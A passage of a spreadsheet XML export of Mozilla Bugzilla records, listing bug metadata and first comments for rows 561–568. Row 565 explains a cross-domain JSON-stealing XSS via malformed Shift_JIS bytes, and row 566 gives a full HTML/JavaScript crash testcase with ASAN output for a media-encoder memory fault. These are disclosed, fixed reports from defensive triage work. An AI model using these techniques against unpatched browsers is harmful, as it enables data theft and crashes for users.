        <v>1</v>
      </c>
      <c r="G561" t="n">
        <v>3</v>
      </c>
      <c r="H561" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I561" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J561" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K561" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L561" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M561" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N561" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O561" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P561" t="inlineStr">
        <is>
          <t>[sg:dos] null deref, but maybe scary during mutation?</t>
        </is>
      </c>
      <c r="Q561" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R561" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S561" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T561" t="n">
        <v>1</v>
      </c>
      <c r="U561" t="n">
        <v>0</v>
      </c>
      <c r="V561" t="n">
        <v>36</v>
      </c>
      <c r="W561" t="inlineStr">
        <is>
          <t>Created attachment 329484
testcase
splitted from bug #442227 comment #8</t>
        </is>
      </c>
      <c r="X561" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="562">
      <c r="A562" t="n">
        <v>491907</v>
      </c>
      <c r="B562" t="inlineStr">
        <is>
          <t>2009-05-07 12:02:07 -0700</t>
        </is>
      </c>
      <c r="C562" t="inlineStr">
        <is>
          <t>Need recaptcha module for QMO</t>
        </is>
      </c>
      <c r="D562" t="inlineStr">
        <is>
          <t>2009-06-16 05:25:33 -0700</t>
        </is>
      </c>
      <c r="E562" t="n">
        <v>1</v>
      </c>
      <c r="F562" t="n">
        <v>1</v>
      </c>
      <c r="G562" t="n">
        <v>5</v>
      </c>
      <c r="H562" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I562" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J562" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K562" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L562" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M562" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N562" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O562" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P562" t="inlineStr"/>
      <c r="Q562" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R562" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S562" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T562" t="n">
        <v>1</v>
      </c>
      <c r="U562" t="n">
        <v>0</v>
      </c>
      <c r="V562" t="n">
        <v>9</v>
      </c>
      <c r="W562" t="inlineStr">
        <is>
          <t>We had in the recent days some problems with forum spammer. We have enabled image captchas now, but it has accessibility problems, so we need the recaptcha module.
http://drupal.org/project/recaptcha</t>
        </is>
      </c>
      <c r="X562" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="563">
      <c r="A563" t="n">
        <v>858101</v>
      </c>
      <c r="B563" t="inlineStr">
        <is>
          <t>2013-04-04 08:50:58 -0700</t>
        </is>
      </c>
      <c r="C563" t="inlineStr">
        <is>
          <t>[[DefaultValue]] on XrayWrapper can call content-defined toString/valueOf methods</t>
        </is>
      </c>
      <c r="D563" t="inlineStr">
        <is>
          <t>2014-11-19 19:46:37 -0800</t>
        </is>
      </c>
      <c r="E563" t="n">
        <v>1</v>
      </c>
      <c r="F563" t="n">
        <v>1</v>
      </c>
      <c r="G563" t="n">
        <v>3</v>
      </c>
      <c r="H563" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I563" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J563" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K563" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L563" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M563" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N563" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O563" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P563" t="inlineStr">
        <is>
          <t>[adv-main22+][adv-esr1707+]</t>
        </is>
      </c>
      <c r="Q563" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R563" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S563" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T563" t="n">
        <v>1</v>
      </c>
      <c r="U563" t="n">
        <v>0</v>
      </c>
      <c r="V563" t="n">
        <v>59</v>
      </c>
      <c r="W563" t="inlineStr">
        <is>
          <t>This is a regression between Firefox 6.0.2 and Firefox 7.  See also bug 720619.</t>
        </is>
      </c>
      <c r="X563" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="564">
      <c r="A564" t="n">
        <v>1391947</v>
      </c>
      <c r="B564" t="inlineStr">
        <is>
          <t>2017-08-19 04:12:58 -0700</t>
        </is>
      </c>
      <c r="C564" t="inlineStr">
        <is>
          <t>Make "View Bookmarks Sidebar" item active in "Bookmarks" button menu and add its proper new Photon item icon</t>
        </is>
      </c>
      <c r="D564" t="inlineStr">
        <is>
          <t>2019-05-21 01:48:30 -0700</t>
        </is>
      </c>
      <c r="E564" t="n">
        <v>1</v>
      </c>
      <c r="F564" t="n">
        <v>1</v>
      </c>
      <c r="G564" t="n">
        <v>2</v>
      </c>
      <c r="H564" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I564" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J564" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K564" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L564" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M564" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N564" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O564" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P564" t="inlineStr">
        <is>
          <t>[reserve-photon-structure] [fixed by patch from bug #1391948]</t>
        </is>
      </c>
      <c r="Q564" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R564" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S564" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T564" t="n">
        <v>1</v>
      </c>
      <c r="U564" t="n">
        <v>1</v>
      </c>
      <c r="V564" t="n">
        <v>8</v>
      </c>
      <c r="W564" t="inlineStr">
        <is>
          <t>Created attachment 8899107
screenshot.png
"View Bookmarks Sidebar" item icon is missing in "Bookmarks" button menu
The proper icon for "View Bookmarks Sidebar" item is shown in:
- "Hamburger" button menu =&gt; "Library" item menu =&gt; "Bookmarks" item menu =&gt; "Bookmarking tools" item menu
- "Library" button menu =&gt; "Bookmarks" item menu =&gt; "Bookmarking tools" item menu</t>
        </is>
      </c>
      <c r="X564" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="565">
      <c r="A565" t="n">
        <v>690225</v>
      </c>
      <c r="B565" t="inlineStr">
        <is>
          <t>2011-09-28 20:56:20 -0700</t>
        </is>
      </c>
      <c r="C565" t="inlineStr">
        <is>
          <t>Universal XSS likely with MultiByte charset (e.g. japanese sites)</t>
        </is>
      </c>
      <c r="D565" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:38 -0700</t>
        </is>
      </c>
      <c r="E565" t="n">
        <v>1</v>
      </c>
      <c r="F565" t="n">
        <v>1</v>
      </c>
      <c r="G565" t="n">
        <v>3</v>
      </c>
      <c r="H565" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I565" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J565" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K565" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L565" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M565" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N565" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O565" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P565" t="inlineStr">
        <is>
          <t>[sg:high/moderate][qa!]</t>
        </is>
      </c>
      <c r="Q565" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R565" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S565" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T565" t="n">
        <v>1</v>
      </c>
      <c r="U565" t="n">
        <v>1</v>
      </c>
      <c r="V565" t="n">
        <v>32</v>
      </c>
      <c r="W565" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.0; rv:7.0) Gecko/20100101 Firefox/7.0
Build ID: 20110916091512
Steps to reproduce:
JSON containing broken MBCS sequence allows hijacking by attacker.
Attacker can read the secret contents of JSON across the domain if attacker can control some field in it.
PoC is here: http://utf-8.jp/PoC/mbcs-json.html
Actual results:
Byte sequence "0x82 0x22" is invalid for Shift_JIS.
therefore, it should be treated as 2 letters, such as "(U+FFFD)(U+0022)"
but Firefox treats it as 1 letter so double quote trailing invalid lead byte is vanished.
Expected results:
Treat invalid byte sequence correctly like as UTF-8.
in utf-8, "0xC2 0x22" is treated as 2 lettes, "(U+FFFD)(U+0022)".</t>
        </is>
      </c>
      <c r="X565" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="566">
      <c r="A566" t="n">
        <v>1453127</v>
      </c>
      <c r="B566" t="inlineStr">
        <is>
          <t>2018-04-10 13:22:19 -0700</t>
        </is>
      </c>
      <c r="C566" t="inlineStr">
        <is>
          <t>SEGV in mozilla::MediaEncoder::AudioTrackListener::NotifyRealtimeTrackData</t>
        </is>
      </c>
      <c r="D566" t="inlineStr">
        <is>
          <t>2024-05-30 09:45:00 -0700</t>
        </is>
      </c>
      <c r="E566" t="n">
        <v>1</v>
      </c>
      <c r="F566" t="n">
        <v>1</v>
      </c>
      <c r="G566" t="n">
        <v>3</v>
      </c>
      <c r="H566" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I566" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J566" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K566" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L566" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M566" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N566" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O566" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P566" t="inlineStr">
        <is>
          <t>[adv-main61+][adv-esr52.9+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q566" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R566" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S566" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T566" t="n">
        <v>1</v>
      </c>
      <c r="U566" t="n">
        <v>0</v>
      </c>
      <c r="V566" t="n">
        <v>83</v>
      </c>
      <c r="W566" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox 61.0a1 (SourceStamp=30d72755b1749953d438199456f1524ce84ab5e5). It requires the three attached media files in the same directory and might require a few attempts to trigger. It works best for me when loaded from a file:// location, however I also managed to reproduce from a HTTP server.
crash.html
&lt;script&gt;
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start() {	
	o208=document.createElementNS('http://www.w3.org/1999/xhtml','video');
	o208.autoplay=true;
	o208.setAttribute('src','1.ogg');
	o208.onplaying=fun0;
	spin();
	o379=o208.mozCaptureStreamUntilEnded();
	o208.setAttribute('src','2.webm');
	window.setTimeout("location.reload()",400);
}
function fun0() {
	try{o573=new MediaRecorder(o379);}catch(e){}
	o208.setAttribute('src','3.webm');
	try{o573.start();}catch(e){}
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==13484==ERROR: AddressSanitizer: SEGV on unknown address 0x00009fff8000 (pc 0x7fd41288058a bp 0x7fd3f3fd8ff0 sp 0x7fd3f3fd8fa0 T304)
==13484==The signal is caused by a READ memory access.
    #0 0x7fd412880589 in Length /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:369:43
    #1 0x7fd412880589 in AppendElements&lt;const void *, nsTArrayInfallibleAllocator, nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1637
    #2 0x7fd412880589 in AutoTArray /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2457
    #3 0x7fd412880589 in AudioChunk /builds/worker/workspace/build/src/dom/media/AudioSegment.h:161
    #4 0x7fd412880589 in Construct&lt;const mozilla::AudioChunk &amp;&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:539
    #5 0x7fd412880589 in mozilla::AudioChunk* nsTArray_Impl&lt;mozilla::AudioChunk, nsTArrayInfallibleAllocator&gt;::AppendElement&lt;mozilla::AudioChunk const&amp;, nsTArrayInfallibleAllocator&gt;(mozilla::AudioChunk const&amp;) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2291
    #6 0x7fd41287febb in mozilla::MediaSegmentBase&lt;mozilla::AudioSegment, mozilla::AudioChunk&gt;::AppendSliceInternal(mozilla::MediaSegmentBase&lt;mozilla::AudioSegment, mozilla::AudioChunk&gt; const&amp;, long, long) /builds/worker/workspace/build/src/obj-firefox/dist/include/MediaSegment.h:512:19
    #7 0x7fd41746dd94 in AppendSlice /builds/worker/workspace/build/src/obj-firefox/dist/include/MediaSegment.h:277:5
    #8 0x7fd41746dd94 in mozilla::MediaEncoder::AudioTrackListener::NotifyRealtimeTrackData(mozilla::MediaStreamGraph*, long, mozilla::MediaSegment const&amp;) /builds/worker/workspace/build/src/dom/media/encoder/MediaEncoder.cpp:150
    #9 0x7fd41746cc86 in mozilla::MediaEncoder::AudioTrackListener::NotifyQueuedChanges(mozilla::MediaStreamGraph*, long, mozilla::MediaSegment const&amp;) /builds/worker/workspace/build/src/dom/media/encoder/MediaEncoder.cpp:123:7
    #10 0x7fd417074766 in mozilla::TrackUnionStream::CopyTrackData(mozilla::StreamTracks::Track*, unsigned int, long, long, bool*) /builds/worker/workspace/build/src/dom/media/TrackUnionStream.cpp:355:22
    #11 0x7fd417072425 in mozilla::TrackUnionStream::ProcessInput(long, long, unsigned int) /builds/worker/workspace/build/src/dom/media/TrackUnionStream.cpp:122:11
    #12 0x7fd417367045 in mozilla::MediaStreamGraphImpl::Process() /builds/worker/workspace/build/src/dom/media/MediaStreamGraph.cpp:1271:15
    #13 0x7fd417368014 in mozilla::MediaStreamGraphImpl::OneIteration(long) /builds/worker/workspace/build/src/dom/media/MediaStreamGraph.cpp:1357:3
    #14 0x7fd4170fa844 in mozilla::ThreadedDriver::RunThread() /builds/worker/workspace/build/src/dom/media/GraphDriver.cpp:319:40
    #15 0x7fd417124552 in mozilla::MediaStreamGraphInitThreadRunnable::Run() /builds/worker/workspace/build/src/dom/media/GraphDriver.cpp:194:14
    #16 0x7fd410cb3f18 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1096:14
    #17 0x7fd410cd0350 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #18 0x7fd411ba544b in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:334:20
    #19 0x7fd411af4229 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #20 0x7fd411af4229 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #21 0x7fd411af4229 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #22 0x7fd410cae368 in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:425:11
    #23 0x7fd42e1d647e in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #24 0x7fd431b636b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
    #25 0x7fd430bec3dc in clone (/lib/x86_64-linux-gnu/libc.so.6+0x1073dc)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:369:43 in Length
Thread T304 (MediaStreamGrph) created by T303 (CubebOp~tion #1) here:
    #0 0x4ae80d in __interceptor_pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:204:3
    #1 0x7fd42e1d31cf in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:433:14
    #2 0x7fd42e1d2dbe in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:518:12
    #3 0x7fd410cb02e3 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:612:8
    #4 0x7fd410cb9eca in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:471:22
    #5 0x7fd410cca454 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:143:45
    #6 0x7fd4170f9a25 in NS_NewNamedThread&lt;16&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:72:10
    #7 0x7fd4170f9a25 in mozilla::ThreadedDriver::Start() /builds/worker/workspace/build/src/dom/media/GraphDriver.cpp:210
    #8 0x7fd4170fc950 in mozilla::AudioCallbackDriver::Init() /builds/worker/workspace/build/src/dom/media/GraphDriver.cpp:625:5
    #9 0x7fd4170fbd34 in mozilla::AsyncCubebTask::Run() /builds/worker/workspace/build/src/dom/media/GraphDriver.cpp:495:21
    #10 0x7fd410ccb05c in nsThreadPool::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadPool.cpp:228:14
    #11 0x7fd410ccb75c in non-virtual thunk to nsThreadPool::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadPool.cpp
    #12 0x7fd410cb3f18 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1096:14
    #13 0x7fd410cd0350 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #14 0x7fd411ba55cc in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:364:5
    #15 0x7fd411af4229 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #16 0x7fd411af4229 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #17 0x7fd411af4229 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #18 0x7fd410cae368 in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:425:11
    #19 0x7fd42e1d647e in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #20 0x7fd431b636b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
Thread T303 (CubebOp~tion #1) created by T0 (file:// Content) here:
    #0 0x4ae80d in __interceptor_pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:204:3
    #1 0x7fd42e1d31cf in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:433:14
    #2 0x7fd42e1d2dbe in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:518:12
    #3 0x7fd410cb02e3 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:612:8
    #4 0x7fd410cb9eca in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:471:22
    #5 0x7fd410cc9dbf in NS_NewNamedThread /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:143:45
    #6 0x7fd410cc9dbf in nsThreadPool::PutEvent(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/workspace/build/src/xpcom/threads/nsThreadPool.cpp:109
    #7 0x7fd410ccb916 in nsThreadPool::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/workspace/build/src/xpcom/threads/nsThreadPool.cpp:277:5
    #8 0x7fd4170ff953 in Dispatch /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIEventTarget.h:37:14
    #9 0x7fd4170ff953 in Dispatch /builds/worker/workspace/build/src/dom/media/GraphDriver.h:583
    #10 0x7fd4170ff953 in mozilla::AudioCallbackDriver::Start() /builds/worker/workspace/build/src/dom/media/GraphDriver.cpp:748
    #11 0x7fd417369bba in mozilla::MediaStreamGraphImpl::RunInStableState(bool) /builds/worker/workspace/build/src/dom/media/MediaStreamGraph.cpp:1693:17
    #12 0x7fd41738e48f in mozilla::(anonymous namespace)::MediaStreamGraphStableStateRunnable::Run() /builds/worker/workspace/build/src/dom/media/MediaStreamGraph.cpp:1548:15
    #13 0x7fd410b0a6c0 in mozilla::CycleCollectedJSContext::ProcessStableStateQueue() /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:312:12
    #14 0x7fd410b0c855 in mozilla::CycleCollectedJSContext::AfterProcessTask(unsigned int) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:377:3
    #15 0x7fd412569d5d in XPCJSContext::AfterProcessTask(unsigned int) /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSContext.cpp:1252:30
    #16 0x7fd410cb49e3 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1133:24
    #17 0x7fd410cd0350 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #18 0x7fd411ba445a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #19 0x7fd411af4229 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #20 0x7fd411af4229 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #21 0x7fd411af4229 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #22 0x7fd418815eba in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #23 0x7fd41cad7edb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #24 0x7fd411af4229 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #25 0x7fd411af4229 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #26 0x7fd411af4229 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #27 0x7fd41cad78a2 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:719:34
    #28 0x4f50dc in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #29 0x4f50dc in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #30 0x7fd430b0582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
==13484==ABORTING</t>
        </is>
      </c>
      <c r="X566" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="567">
      <c r="A567" t="n">
        <v>1386255</v>
      </c>
      <c r="B567" t="inlineStr">
        <is>
          <t>2017-08-01 06:53:58 -0700</t>
        </is>
      </c>
      <c r="C567" t="inlineStr">
        <is>
          <t>photon animated refresh button gets confused and gets stuck on disabled stop button</t>
        </is>
      </c>
      <c r="D567" t="inlineStr">
        <is>
          <t>2017-09-23 03:35:57 -0700</t>
        </is>
      </c>
      <c r="E567" t="n">
        <v>1</v>
      </c>
      <c r="F567" t="n">
        <v>1</v>
      </c>
      <c r="G567" t="n">
        <v>2</v>
      </c>
      <c r="H567" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I567" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J567" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K567" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L567" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M567" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N567" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O567" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P567" t="inlineStr">
        <is>
          <t>[reserve-photon-animation]</t>
        </is>
      </c>
      <c r="Q567" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R567" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S567" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T567" t="n">
        <v>0</v>
      </c>
      <c r="U567" t="n">
        <v>0</v>
      </c>
      <c r="V567" t="n">
        <v>21</v>
      </c>
      <c r="W567" t="inlineStr">
        <is>
          <t>Created attachment 8892445
Screenshot 2017-08-01 09.47.54.png
STR:
1. Open a new nightly
2. Load this page in a new tab: https://beta.doodle.com/poll/w8zhuavpk6ya4kwr
3. If you get a first time overlay, dismiss and go back to (2)
About 50% of the time I end up on a disabled stop button on this page.  I noticed because I wanted to reload, but the button wasn't available.
See attached screenshot.
I'm on windows 10 using 56.0a1 (2017-08-01) (64-bit).</t>
        </is>
      </c>
      <c r="X567" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="568">
      <c r="A568" t="n">
        <v>1515342</v>
      </c>
      <c r="B568" t="inlineStr">
        <is>
          <t>2018-12-19 07:26:34 -0800</t>
        </is>
      </c>
      <c r="C568" t="inlineStr">
        <is>
          <t>Empty or malformed p256-ECDH public keys from project Wycheproof cause segfault</t>
        </is>
      </c>
      <c r="D568" t="inlineStr">
        <is>
          <t>2020-06-05 00:04:27 -0700</t>
        </is>
      </c>
      <c r="E568" t="n">
        <v>1</v>
      </c>
      <c r="F568" t="n">
        <v>1</v>
      </c>
      <c r="G568" t="n">
        <v>3</v>
      </c>
      <c r="H568" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I568" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J568" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K568" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L568" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M568" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N568" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O568" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P568" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main68+][adv-esr60.8+]</t>
        </is>
      </c>
      <c r="Q568" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R568" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
